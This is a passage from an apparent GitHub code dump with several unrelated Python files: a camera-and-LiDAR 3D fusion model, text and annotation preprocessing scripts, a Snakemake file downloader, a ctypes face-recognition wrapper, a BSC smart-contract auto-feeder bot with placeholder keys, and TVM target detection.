mmcv.cnn.bricks.transformer import build_transformer_layer_sequence\n\nfrom mmcv.cnn import build_conv_layer, build_norm_layer\n\nfrom mmcv.cnn.bricks.transformer import build_positional_encoding\nfrom mmdet3d.models.mmim.point_generator import MlvlPointGenerator\n\nfrom mmcv.runner import auto_fp16, force_fp32\nimport math\nimport numpy as np\nimport torch.nn.functional as F\nfrom mmdet3d.models.mmim.deform_fusion_module import MultiScaleDeformableAttention3D\nfrom .base import Base3DFusionModel\n\nfrom typing import Any, Dict \n\nfrom mmdet3d.models.builder import (\n build_backbone,\n build_head,\n build_neck,\n build_voxel_encoder,\n build_vtransform,\n build_middle_encoder,\n)\nfrom mmdet3d.ops import Voxelization, DynamicScatter\n\n\n@FUSIONMODELS.register_module()\nclass UniM2AE_MMIM(Base3DFusionModel):\n def __init__(\n self, \n encoders: Dict[str, Any],\n fusion_module: Dict[str, Any],\n decoder: Dict[str, Any],\n heads: Dict[str, Any],\n **kwargs,\n ):\n super(UniM2AE_MMIM, self).__init__()\n \n self.encoders = nn.ModuleDict()\n if encoders.get(\"camera\") is not None:\n self.encoders[\"camera\"] = nn.ModuleDict(\n {\n \"backbone\": build_backbone(encoders[\"camera\"][\"backbone\"]),\n \"neck\": build_neck(encoders[\"camera\"][\"neck\"]),\n \"vtransform\": build_vtransform(encoders[\"camera\"][\"vtransform\"]),\n }\n )\n if encoders.get(\"lidar\") is not None:\n if encoders[\"lidar\"][\"voxelize\"].get(\"max_num_points\", -1) > 0 or \\\n encoders[\"lidar\"][\"voxelize\"].get(\"Voxelization\", False):\n if 'Voxelization' in encoders[\"lidar\"][\"voxelize\"]:\n encoders[\"lidar\"][\"voxelize\"].pop(\"Voxelization\")\n voxelize_module = Voxelization(**encoders[\"lidar\"][\"voxelize\"])\n else:\n voxelize_module = DynamicScatter(**encoders[\"lidar\"][\"voxelize\"])\n self.encoders[\"lidar\"] = nn.ModuleDict(\n {\n \"voxelize\": voxelize_module,\n \"voxel_encoder\": build_voxel_encoder(encoders[\"lidar\"][\"voxel_encoder\"]) if encoders[\"lidar\"].get(\"voxel_encoder\", None) else None,\n \"middle_encoder\": build_middle_encoder(encoders[\"lidar\"][\"middle_encoder\"]) if encoders[\"lidar\"].get(\"middle_encoder\", None) else None,\n \"backbone\": build_backbone(encoders[\"lidar\"][\"backbone\"]),\n }\n )\n self.voxelize_reduce = encoders[\"lidar\"].get(\"voxelize_reduce\", True)\n\n self.decoder = nn.ModuleDict(\n {\n \"backbone\": build_backbone(decoder[\"backbone\"]),\n \"neck\": 
build_neck(decoder[\"neck\"]),\n }\n )\n self.heads = nn.ModuleDict()\n for name in heads:\n if heads[name] is not None:\n self.heads[name] = build_head(heads[name])\n\n if \"loss_scale\" in kwargs:\n self.loss_scale = kwargs[\"loss_scale\"]\n else:\n self.loss_scale = dict()\n for name in heads:\n if heads[name] is not None:\n self.loss_scale[name] = 1.0\n \n norm_cfg=dict(type='GN', num_groups=16, requires_grad=True)\n conv_cfg=dict(type='Conv3d', bias=False)\n \n self.deblock_camera = nn.Sequential(\n build_conv_layer(conv_cfg,\n in_channels=80,\n out_channels=192,\n kernel_size=3,\n stride=2,\n padding=1),\n build_norm_layer(norm_cfg, 192)[1],\n nn.ReLU(inplace=True),\n )\n \n self.deblock_lidar = nn.Sequential(\n build_conv_layer(\n conv_cfg,\n in_channels=128,\n out_channels=192,\n kernel_size=3,\n stride=2,\n padding=1\n ),\n build_norm_layer(norm_cfg, 192)[1],\n nn.ReLU(inplace=True),\n )\n\n self.deblock_fusion = nn.Sequential(\n nn.Conv2d(384, 192, kernel_size=1, stride=1, bias=False),\n build_norm_layer(dict(type='BN', eps=1.0e-3, momentum=0.01), 192)[1],\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(192, 192, kernel_size=2, stride=2, bias=False),\n build_norm_layer(dict(type='BN', eps=1.0e-3, momentum=0.01), 192)[1],\n nn.ReLU(inplace=True),\n nn.Conv2d(192, 128, kernel_size=1, stride=1, bias=False),\n build_norm_layer(dict(type='BN', eps=1.0e-3, momentum=0.01), 128)[1],\n nn.ReLU(inplace=True),\n )\n \n self.postional_encoding = build_positional_encoding(fusion_module[\"positional_encoding\"])\n self.strides = fusion_module[\"strides\"]\n self.num_encoder_levels = fusion_module[\"encoder\"].transformerlayers.attn_cfgs.num_levels\n self.level_encoding = nn.Embedding(self.num_encoder_levels, fusion_module[\"embed_dims\"])\n self.point_generator = MlvlPointGenerator(self.strides)\n self.fuser = build_transformer_layer_sequence(fusion_module[\"encoder\"])\n self.relu1 = nn.ReLU(inplace=True)\n self.relu2 = nn.ReLU(inplace=True)\n \n self.init_weights()\n\n def init_weights(self):\n if \"camera\" in self.encoders:\n self.encoders[\"camera\"][\"backbone\"].init_weights()\n \n for p in self.fuser.parameters():\n if p.dim() > 1:\n nn.init.xavier_normal_(p)\n\n for layer in self.fuser.layers:\n for attn in layer.attentions:\n if isinstance(attn, MultiScaleDeformableAttention3D):\n attn.init_weights()\n \n def volume_vtransform_embed(self, camera_x, img_metas):\n B, N, C, H, W = camera_x.shape\n dtype = camera_x.dtype\n volume_queries = self.volume_embedding.weight.to(dtype)\n \n volume_queries = volume_queries.unsqueeze(1).repeat(1, B, 1)\n view_features = self.transfer_conv(camera_x.view(B*N, C, H, W))\n view_features = view_features.view(B, N, -1, H, W).flatten(3).permute(1, 0, 3, 2)\n view_features = view_features + self.cams_embeds[:, None, None, :].to(view_features.dtype)\n view_features = view_features + self.level_embeds[None, None, 0:1, :].to(view_features.dtype)\n spatial_shapes = torch.as_tensor([[H, W]], dtype=torch.long, device=view_features.device)\n level_start_index = spatial_shapes.new_zeros((1,))\n view_features = view_features.permute(0, 2, 1, 3)\n \n volume_embed = self.encoders[\"camera\"][\"vtransform\"](\n volume_queries,\n view_features,\n view_features,\n volume_h=self.volume_h,\n volume_w=self.volume_w,\n volume_z=self.volume_z,\n spatial_shapes=spatial_shapes,\n level_start_index=level_start_index,\n img_metas=img_metas\n ).reshape(B, self.volume_z, self.volume_h, self.volume_w, -1).permute(0, 4, 3, 2, 1)\n \n volume_embed = 
self.deblock_camera(volume_embed)\n\n return volume_embed\n \n def fusion_module(self, volume_feats):\n batch_size, C, W, H, Z = volume_feats[0].shape\n \n encoder_inputs_list = []\n padding_mask_list = []\n level_positional_encoding_list = []\n spatial_shape_list = []\n reference_points_list = []\n \n for i in range(self.num_encoder_levels):\n feat = volume_feats[i]\n # X, Y, Z\n volume_shape = volume_feats[i].shape[-3:]\n padding_mask_resized = feat.new_zeros((batch_size,)+volume_shape, \n dtype=torch.bool)\n pos_embed = self.postional_encoding(padding_mask_resized)\n level_embed = self.level_encoding.weight[i]\n level_pos_embed = level_embed.view(1, -1, 1, 1, 1) + pos_embed\n \n reference_points = self.point_generator.single_level_grid_priors(\n volume_shape, i, device=feat.device)\n \n factor = feat.new_tensor([volume_shape[::-1]]) * self.strides[i]\n reference_points = reference_points / factor\n \n volume_projected = feat.flatten(2).permute(2, 0, 1)\n level_pos_embed = level_pos_embed.flatten(2).permute(2, 0, 1)\n padding_mask_resized = padding_mask_resized.flatten(1)\n \n encoder_inputs_list.append(volume_projected)\n padding_mask_list.append(padding_mask_resized)\n level_positional_encoding_list.append(level_pos_embed)\n spatial_shape_list.append(volume_shape)\n reference_points_list.append(reference_points)\n \n padding_mask = torch.cat(padding_mask_list, dim=1)\n spatial_shapes = torch.as_tensor(spatial_shape_list, dtype=torch.long, device=volume_feats[0].device)\n level_start_index = torch.cat((spatial_shapes.new_zeros(\n (1, )), spatial_shapes.prod(1).cumsum(0)[:-1]))\n reference_points = torch.cat(reference_points_list, dim=0)\n reference_points = reference_points[None, :, None].repeat(\n batch_size, 1, self.num_encoder_levels, 1)\n valid_radios = reference_points.new_ones(\n (batch_size, self.num_encoder_levels, 2))\n encoder_inputs = torch.cat(encoder_inputs_list, dim=0)\n level_positional_encodings = torch.cat(level_positional_encoding_list, dim=0)\n \n volume_feat = self.fuser(\n query=encoder_inputs,\n key=None,\n value=None,\n query_pos=level_positional_encodings,\n key_pos=None,\n attn_masks=None,\n key_padding_mask=None,\n query_key_padding_mask=padding_mask,\n spatial_shapes=spatial_shapes,\n reference_points=reference_points,\n level_start_index=level_start_index,\n valid_radios=valid_radios\n )\n \n lidar_feat, camera_feat = torch.split(volume_feat, level_start_index[1])\n \n lidar_feat = lidar_feat.permute(1, 2, 0).view(batch_size, -1, W, H, Z)\n lidar_feat = self.relu1(lidar_feat+volume_feats[0])\n camera_feat = camera_feat.permute(1, 2, 0).view(batch_size, -1, W, H, Z)\n camera_feat = self.relu2(camera_feat+volume_feats[1])\n \n return lidar_feat, camera_feat\n \n def extract_camera_features(\n self, \n x, \n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n img_metas\n ) -> torch.Tensor:\n B, N, C, H, W = x.size()\n x = x.view(B * N, C, H, W)\n\n x = self.encoders[\"camera\"][\"backbone\"](x)\n x = self.encoders[\"camera\"][\"neck\"](x)\n \n if not isinstance(x, torch.Tensor):\n x = x[0]\n \n BN, C, H, W = x.size()\n x = x.view(B, int(BN / B), C, H, W)\n # x = self.volume_vtransform_embed(x, img_metas)\n x = self.encoders[\"camera\"][\"vtransform\"](\n x,\n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n img_metas,\n )\n \n x = self.deblock_camera(x)\n \n return x\n \n 
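# NOTE (editor): illustrative sketch of the coordinate batching used by the\n
# voxelize_sst()/voxelize() methods below. F.pad(coor, (1, 0), value=i)\n
# left-pads the last dimension, i.e. it prepends the sample index i to each\n
# voxel coordinate so coordinates from a whole batch can be concatenated into\n
# a single tensor. Standalone example (coordinate values invented):\n
#\n
#   import torch\n
#   import torch.nn.functional as F\n
#   coors = torch.tensor([[0, 2, 3], [1, 4, 5]])  # one (z, y, x) row per voxel\n
#   F.pad(coors, (1, 0), mode='constant', value=7)\n
#   # -> tensor([[7, 0, 2, 3],\n
#   #            [7, 1, 4, 5]])\n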
@torch.no_grad()\n @force_fp32()\n def voxelize_sst(self, points):\n \"\"\"Apply dynamic voxelization to points.\n\n Args:\n points (list[torch.Tensor]): Points of each sample.\n\n Returns:\n tuple[torch.Tensor]: Concatenated points and coordinates.\n \"\"\"\n coors = []\n # dynamic voxelization only provides a coors mapping\n for res in points:\n res_coors = self.encoders[\"lidar\"][\"voxelize\"](res)\n coors.append(res_coors)\n points = torch.cat(points, dim=0)\n coors_batch = []\n for i, coor in enumerate(coors):\n coor_pad = F.pad(coor, (1, 0), mode='constant', value=i)\n coors_batch.append(coor_pad)\n coors_batch = torch.cat(coors_batch, dim=0)\n return points, coors_batch\n\n @torch.no_grad()\n @force_fp32()\n def voxelize(self, points):\n feats, coords, sizes = [], [], []\n for k, res in enumerate(points):\n ret = self.encoders[\"lidar\"][\"voxelize\"](res)\n if len(ret) == 3:\n # hard voxelize\n f, c, n = ret\n else:\n assert len(ret) == 2\n f, c = ret\n n = None\n feats.append(f)\n coords.append(F.pad(c, (1, 0), mode=\"constant\", value=k))\n if n is not None:\n sizes.append(n)\n\n feats = torch.cat(feats, dim=0)\n coords = torch.cat(coords, dim=0)\n if len(sizes) > 0:\n sizes = torch.cat(sizes, dim=0)\n if self.voxelize_reduce:\n feats = feats.sum(dim=1, keepdim=False) / sizes.type_as(feats).view(\n -1, 1\n )\n feats = feats.contiguous()\n\n return feats, coords, sizes\n \n def extract_lidar_features(self, x) -> torch.Tensor:\n voxels, coors = self.voxelize_sst(x)\n batch_size = coors[-1, 0].item() + 1\n voxel_features, feature_coors = self.encoders[\"lidar\"][\"voxel_encoder\"](voxels, coors)\n x = self.encoders[\"lidar\"][\"middle_encoder\"](voxel_features, feature_coors, batch_size)\n x = self.encoders[\"lidar\"][\"backbone\"](x)\n return x\n \n @auto_fp16(apply_to=('img', 'points'))\n def forward(self,\n img,\n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas,\n gt_bboxes_3d=None,\n gt_labels_3d=None,\n gt_masks_bev=None,\n **kwargs,\n ):\n \n if isinstance(img, list):\n raise NotImplementedError\n else:\n output = self.forward_single(\n img,\n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas,\n gt_bboxes_3d,\n gt_labels_3d,\n gt_masks_bev\n )\n return output\n \n @auto_fp16(apply_to=(\"img\", \"points\"))\n def forward_single(self, \n img, \n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas,\n gt_bboxes_3d=None,\n gt_labels_3d=None,\n gt_masks_bev=None,\n ):\n \n features = []\n for sensor in (\n self.encoders if not self.training else list(self.encoders.keys())[::-1]\n ):\n if sensor == \"camera\":\n feature = self.extract_camera_features(\n img, \n points,\n camera2ego,\n lidar2ego,\n lidar2camera,\n lidar2image,\n camera_intrinsics,\n camera2lidar,\n img_aug_matrix,\n lidar_aug_matrix,\n metas\n )\n elif sensor == \"lidar\":\n feature = self.extract_lidar_features(points)\n feature = self.deblock_lidar(feature)\n else:\n raise ValueError(f\"unsupported sensor: {sensor}\")\n features.append(feature)\n \n if not self.training:\n # avoid OOM\n features = features[::-1]\n \n x = self.fusion_module(features)\n x = torch.cat(x, dim=1)\n x = torch.cat(x.unbind(dim=-1), 1)\n \n x = self.deblock_fusion(x)\n \n batch_size = x.shape[0]\n\n x = self.decoder[\"backbone\"](x)\n x = 
self.decoder[\"neck\"](x)\n \n if self.training:\n outputs = {}\n for type, head in self.heads.items():\n if type == \"object\":\n pred_dict = head(x, metas)\n losses = head.loss(gt_bboxes_3d, gt_labels_3d, pred_dict)\n elif type == \"map\":\n losses = head(x, gt_masks_bev)\n else:\n raise ValueError(f\"unsupported head: {type}\")\n for name, val in losses.items():\n if val.requires_grad:\n outputs[f\"loss/{type}/{name}\"] = val * self.loss_scale[type]\n else:\n outputs[f\"stats/{type}/{name}\"] = val\n return outputs\n else:\n outputs = [{} for _ in range(batch_size)]\n # viz = True\n for type, head in self.heads.items():\n if type == \"object\":\n pred_dict = head(x, metas)\n bboxes = head.get_bboxes(pred_dict, metas)\n if isinstance(bboxes, torch.Tensor):\n return bboxes\n else:\n for k, (boxes, scores, labels) in enumerate(bboxes):\n outputs[k].update(\n {\n \"boxes_3d\": boxes.to(\"cpu\"),\n \"scores_3d\": scores.cpu(),\n \"labels_3d\": labels.cpu(),\n }\n )\n elif type == \"map\":\n logits = head(x)\n for k in range(batch_size):\n outputs[k].update(\n {\n \"masks_bev\": logits[k].cpu(),\n \"gt_masks_bev\": gt_masks_bev[k].cpu(),\n }\n )\n else:\n raise ValueError(f\"unsupported head: {type}\")\n return outputs\n","repo_name":"hollow-503/UniM2AE","sub_path":"Finetune/bevfusion/mmdet3d/models/fusion_models/unim2ae_mmim.py","file_name":"unim2ae_mmim.py","file_ext":"py","file_size_in_byte":18905,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"6"} +{"seq_id":"658570011","text":"data_path = \"ultraFinale.txt\"\nnum = -1\nunfinished = False\nfirst = True\nf = open(data_path, encoding=\"utf8\")\nlastLine = \"\"\nlines = f.readlines()\nfor line in lines:\n num += 1\n if len(line) <= 1 and line != \"\\n\":\n lines.pop(num)\nnum = -1\nfor line in lines:\n num += 1\n if line == \"\\n\" and line == lastLine:\n lines.pop(num)\n lastLine = line\nf.close()\n\nnew_file = open(\"lastFinal.txt\", 'w', encoding=\"utf-8\")\n\nfor line in lines:\n new_file.write(line)\n\nnew_file.close()\n","repo_name":"Soontosh/Harry-Potter-Dataset-Cleaning","sub_path":"removeUnecessaryNewLines.py","file_name":"removeUnecessaryNewLines.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43135544981","text":"\"\"\"\nyolo 모델을 학습시키기위해 필요한 annotation txt 파일을 생성하는 script다.\n\"\"\"\n\nimport json\nimport os, glob\nimport time\nfrom tqdm import tqdm\nimport pydicom\nfrom pydicom import dcmread\nimport re\nimport mritopng\nfrom matplotlib import pyplot as plt\n\ndef preprocessing_json(json_dir):\n json_list = get_json_list(json_dir)\n\n for _,json_name in enumerate(tqdm(json_list)):\n data = open_json(json_name)\n dicom_name = json_name[:-11] + '.dcm'\n img_x, img_y = get_dicom_size(dicom_name)\n bbox = get_bbox(data)\n point = get_yolo(bbox, img_x, img_y)\n anot_list = make_anot_list(data, point)\n #folder_name = json_name[:-4]+'txt'\n txt_name = json_name.split('\\\\')[-1][:-11] + '.txt'\n if anot_list:\n save_txt(txt_save_path, txt_name, anot_list)\n time.sleep(0.005)\n\n\ndef get_dicom_size(dicom_name):\n ds = dcmread(dicom_name)\n #ds.PhotometricInterpretation = 'YBR_FULL'\n img_x, img_y = ds.pixel_array.shape\n\n #print(\"dicom size:\", img_x, img_y)\n return img_x, img_y\n\n\n#yolo 모델의 경우 annotation의 형식으로 center(x,y) 좌표와 width, height의 상댓값을 필요로한다.\ndef get_yolo(bbox_list, img_x, img_y):\n point_list = list()\n x_list = list()\n if len(bbox_list) >= 1:\n for i in 
def get_yolo(bbox_list, img_x, img_y):\n point_list = list()\n if len(bbox_list) >= 1:\n for i in range(len(bbox_list)):\n center_x = float(bbox_list[i][2]) / img_x\n center_y = float(bbox_list[i][4]) / img_y\n width = float(bbox_list[i][6]) / img_x\n height = float(bbox_list[i][8]) / img_y\n\n point = str(center_x) + \" \" + str(center_y) + \" \" + str(width) + \" \" + str(height)\n #print(\"point\", point)\n\n point_list.append(point)\n else:\n point_list = []\n\n #print(\"point_list:\", point_list)\n return point_list\n\n\n\ndef get_stage(json_data):\n json_get = json_data.get('images')\n json_get_anot = json_get[0].get('class')\n return str(json_get_anot)\n\ndef open_json(data_path):\n with open(data_path, 'r', encoding='UTF8') as f:\n json_data = json.load(f, strict=False)\n f.close()\n\n #print(\"json_data:\", json_data)\n return json_data\n\n\ndef get_json_list(json_dir):\n json_list = list()\n\n print(\"\\n\")\n print(\"Searching for json files...\")\n\n for root, dirs, files in os.walk(json_dir):\n for file in files:\n if file.endswith(\"_merge.json\"):\n json_path = os.path.join(root, file)\n json_list.append(json_path)\n\n #print(json_list)\n return json_list\n\ndef get_bbox(json_data):\n bbox_list = []\n json_get = json_data.get('images')\n bbox = json_get[0].get('boxes')\n if type(bbox) is str:\n print(type(bbox))\n # the bbox info is stored as a string, so split it apart here\n b = bbox[1:-1]\n bb = re.split('{|}|: |, ', b)\n n = 10\n bbox_list = [bb[i:i + n] for i in range(0, len(bb), n)]\n\n #print(\"bbox_list:\", bbox_list)\n #print(\"len(bbox_list):\", len(bbox_list))\n return bbox_list\n\n\ndef make_anot_list(json_data, point_list):\n anot_list = list()\n if len(point_list) == 0:\n point = get_stage(json_data) + \" \" + str('none')\n anot_list.append(point)\n else:\n for i in range(len(point_list)):\n point = get_stage(json_data) + \" \" + point_list[i]\n #print(\"point:\", point)\n anot_list.append(point)\n\n return anot_list\n\ndef save_txt(save_path, filename, anot_list):\n print(\"Start creating text files...\")\n #with open(folder_name, 'w') as f:\n with open(save_path + \"\\\\\" + filename, 'w') as f:\n f.write('\\n'.join(anot_list))\n f.close()\n\n\ndef dicom2png(json_dir, png_save_path):\n count = 0\n for root, dirs, files in os.walk(json_dir):\n for file in files:\n if file.endswith(\".dcm\"):\n dcm_path = os.path.join(root, file)\n json_path = dcm_path[:-4] + '_merge.json'\n if os.path.isfile(json_path):\n #png_name = dcm_path.split('\\\\')[-1][:-4] + '.png'\n # png_path = png_save_path + \"\\\\\" + png_name\n # d = dcmread(dcm_path)\n # d.PhotometricInterpretation = 'YBR_FULL'\n # plt.imsave(png_path, d.pixel_array, cmap=plt.cm.bone)\n\n png_name = dcm_path.split('\\\\')[-1][:-4] + '.png'\n png_path = png_save_path + png_name\n mritopng.convert_file(dcm_path, png_path)\n count += 1\n print(\"success\", count, png_path)\n\n\n\nif __name__ == '__main__':\n txt_save_path = r\"../../dataset/labels/\" # (edit) path to save the output txt files\n png_save_path = r\"../../dataset/images/\" # (edit) path to save the converted images (dicom to png)\n json_dir = r\"../../dataset/train/\" # (edit) parent folder that contains the merge json files\n\n #test path\n # json_dir = r\"../../dataset/00testtest/\"\n # txt_save_path = r\"../../dataset/00testtest/labels/\"\n # png_save_path = r\"../../dataset/00testtest/images/\"\n\n\n preprocessing_json(json_dir)\n print(\"finished step 1\\n\")\n dicom2png(json_dir, png_save_path)\n 
print(\"끝22222222222222\\n\")","repo_name":"newmade01/PytorchPOC_YOLO_EfficientNet","sub_path":"Train/2.DataPrepare/make_txt_c18.py","file_name":"make_txt_c18.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41193351530","text":"from urllib.request import urlretrieve\nimport pandas as pd\nimport os\nimport gzip\nimport shutil\n\ndef gunzip(infile):\n '''\n Unzip a file with .gz extension. Will remove extension in outfile.\n If the file does not have a .gz extension, do not unzip.\n '''\n if not infile.endswith('.gz'):\n return\n with gzip.open(infile, 'rb') as f_in:\n with open(infile.rstrip('.gz'), 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n os.remove(infile)\n\ndef retrieve_file(address, outfile):\n '''\n If url, download. If file, move it to the new location.\n Note the path of a file should be the absolute path because\n snakemake will likely be run in --directory mode.\n '''\n try:\n local_path, headers = urlretrieve(address, outfile)\n #not url\n except ValueError:\n shutil.copy(address, outfile)\n\nann_df = pd.read_csv(os.path.join(snakemake.config['parameter_dir'],\nsnakemake.config['seqs_and_annotations'])).set_index('organism', drop = False)\n\ndownload_dict = snakemake.params['to_download']\noutdir = snakemake.params['outdir']\nfor i in download_dict:\n address = ann_df.loc[snakemake.wildcards.org, i]\n if address.endswith('.gz'):\n gzipped_file = os.path.join(outdir, download_dict[i]) + '.gz'\n retrieve_file(address, gzipped_file)\n gunzip(gzipped_file)\n else:\n retrieve_file(address, os.path.join(outdir, download_dict[i]))\n","repo_name":"marykthompson/ribopop_probe_design","sub_path":"scripts/download_seqs.py","file_name":"download_seqs.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"32219465692","text":"import ctypes\nimport time\n\nlib = ctypes.cdll.LoadLibrary('./libfacerec.so')\n\ndef ConvertString2CTyoeStr(str):\n result = (ctypes.c_char * len(str))(*str)\n return result\n\n\nclass StructPointer(ctypes.Structure):\n _fields_ = [(\"isRec\", ctypes.c_bool),\n (\"data\", ctypes.c_float * 1025)]\n\n\nclass FaceExt(object):\n def __init__(self):\n self.obj = lib.FaceExt_new()\n\n def init(self):\n lib.FaceExt_init(self.obj)\n\n def getFeature(self, image_path):\n return lib.FaceExt_getFeature(self.obj, image_path)\n\n\nlib.FaceExt_getFeature.restype = ctypes.POINTER(StructPointer)\nfe = FaceExt()\nfe.init()\nfor i in range(0, 3):\n t1 = time.clock()\n image_path = ctypes.c_char_p(bytes(\"./test.jpg\", 'utf-8'))\n t2 = time.clock()\n f = fe.getFeature(image_path)\n t3 = time.clock()\n print(\"isRec:\", f.contents.isRec)\n print(\"data[0]:\")\n print(f.contents.data[0])\n print(\"1\", t2 - t1)\n print(\"2\", t3 - t2)\n","repo_name":"touchwest/Seetaface4py","sub_path":"example/seetaface4py.py","file_name":"seetaface4py.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"10478409630","text":"from web3 import Web3\nfrom time import sleep\nimport time\n\nclass LuckyCatFeeder():\n def __init__(self):\n # Connect to the BSC Web3 provider\n self.web3 = Web3(Web3.HTTPProvider('https://bsc-dataseed.binance.org/'))\n\n with open('luckycat.abi', 'r') as f:\n lucky_abi = f.read()\n lucky_addr = '0xb50e74A6b82F59c4058b5D798E3D9C9D9B8c6e16'\n self.lucky_contract = 
self.web3.eth.contract(address=lucky_addr, abi=lucky_abi)\n \n\n def feed_cats(self):\n self.referral_address = '0xdF0833C041db53856380CF1e64CD6428A9e41D3d'\n self.sender_address= 'WALLET ADDRESS HERE'\n self.nonce = self.web3.eth.get_transaction_count(self.sender_address)\n self.feed_cats = self.lucky_contract.functions.hatchEggs(self.referral_address).buildTransaction({'from': self.sender_address,'value': self.web3.toWei(0,'ether'),'gas': 300000, 'gasPrice': self.web3.toWei('5','gwei'),'nonce': self.nonce,})\n self.signed_txn = self.web3.eth.account.sign_transaction(self.feed_cats, private_key='PRIVATE KEY HERE')\n self.tx_token = self.web3.eth.send_raw_transaction(self.signed_txn.rawTransaction)\n del self.feed_cats\n\nif __name__ == \"__main__\":\n\n lc = LuckyCatFeeder()\n\n\n while(True):\n\n lc.feed_cats()\n print('Cats Fed')\n sleep(86400)","repo_name":"bourbondefi/luckycat-auto-feeder","sub_path":"luckycatautofeeder.py","file_name":"luckycatautofeeder.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21793251722","text":"import logging\n\nimport tvm\nfrom tvm.target import Target\n\nlogger = logging.getLogger(__file__)\n\n\ndef detect_local_metal_host():\n target_triple: str = tvm._ffi.get_global_func(\"tvm.codegen.llvm.GetDefaultTargetTriple\")()\n process_triple: str = tvm._ffi.get_global_func(\"tvm.codegen.llvm.GetProcessTriple\")()\n host_cpu: int = tvm._ffi.get_global_func(\"tvm.codegen.llvm.GetHostCPUName\")()\n logger.info(\n f\"Host CPU dection:\\n Target triple: {target_triple}\\n Process triple: {process_triple}\\n Host CPU: {host_cpu}\"\n )\n if target_triple.startswith(\"x86_64-\"):\n return Target(\n {\n \"kind\": \"llvm\",\n \"mtriple\": \"x86_64-apple-macos\",\n \"mcpu\": host_cpu,\n }\n )\n elif target_triple.startswith(\"arm64-\"):\n return Target(\n {\n \"kind\": \"llvm\",\n \"mtriple\": \"arm64-apple-macos\",\n \"mcpu\": host_cpu,\n }\n )\n else:\n raise RuntimeError(\"Unsupported target triple: %s\" % target_triple)\n\n\ndef detect_local_metal():\n dev = tvm.metal()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"metal\",\n \"max_shared_memory_per_block\": 32768,\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"thread_warp_size\": 32,\n },\n host=detect_local_metal_host(),\n )\n\n\ndef detect_local_cuda():\n dev = tvm.cuda()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"cuda\",\n \"max_shared_memory_per_block\": dev.max_shared_memory_per_block,\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"thread_warp_size\": dev.warp_size,\n \"registers_per_block\": 65536,\n \"arch\": \"sm_\" + dev.compute_version.replace(\".\", \"\"),\n }\n )\n\n\ndef detect_local_rocm():\n dev = tvm.rocm()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"rocm\",\n \"max_shared_memory_per_block\": dev.max_shared_memory_per_block,\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"thread_warp_size\": dev.warp_size,\n }\n )\n\n\ndef detect_local_vulkan():\n dev = tvm.vulkan()\n if not dev.exist:\n return None\n\n return Target(\n {\n \"kind\": \"vulkan\",\n \"max_threads_per_block\": dev.max_threads_per_block,\n \"max_shared_memory_per_block\": dev.max_shared_memory_per_block,\n \"thread_warp_size\": dev.warp_size,\n \"supports_float16\": 1,\n \"supports_int16\": 1,\n \"supports_int8\": 1,\n \"supports_16bit_buffer\": 1,\n }\n )\n\n\ndef detect_local_opencl():\n dev = tvm.opencl()\n if not 
dev.exist:\n return None\n\n return Target(\"opencl\")\n\n\ndef detect_local_target() -> Target:\n for method in [\n detect_local_metal,\n detect_local_rocm,\n detect_local_cuda,\n detect_local_vulkan,\n detect_local_opencl,\n ]:\n target = method()\n if target is not None:\n return target\n\n print(\"Failed to detect local GPU, falling back to CPU as a target\")\n return Target(\"llvm\")\n\n\ndef parse_target(target: str) -> tuple[Target, str]:\n print(target)\n\n if target == \"auto\":\n tvm_target = detect_local_target()\n if tvm_target.host is None:\n tvm_target = Target(\n target,\n host=\"llvm\", # TODO: detect host cpu\n )\n tvm_target_kind = tvm_target.kind.default_keys[0]\n elif target in [\"cuda\", \"cuda-multiarch\"]:\n tvm_target = detect_local_cuda()\n if tvm_target is None:\n raise RuntimeError(\"No local CUDA GPU found!\")\n\n tvm_target_kind = tvm_target.kind.default_keys[0]\n if target == \"cuda-multiarch\":\n tvm_target_kind += \"-multiarch\"\n elif target == \"metal\":\n tvm_target = detect_local_metal()\n if tvm_target is None:\n logger.warning(\"No local Apple Metal GPU found, Falling back...\")\n tvm_target = Target(\n Target(\n {\n \"kind\": \"metal\",\n \"max_threads_per_block\": 256,\n \"max_shared_memory_per_block\": 32768,\n \"thread_warp_size\": 1,\n }\n ),\n host=detect_local_metal_host(),\n )\n\n tvm_target_kind = tvm_target.kind.default_keys[0]\n elif target == \"llvm\":\n tvm_target = Target(target, host=\"llvm\")\n tvm_target_kind = tvm_target.kind.default_keys[0]\n else:\n raise RuntimeError(f\"Unsupported target: {target}\")\n\n print(tvm_target, tvm_target_kind)\n\n if tvm_target_kind == \"cuda-multiarch\":\n from tvm.contrib import nvcc\n\n assert tvm_target.arch[3:] != \"\"\n if int(tvm_target.arch[3:]) >= 70:\n compute_versions = 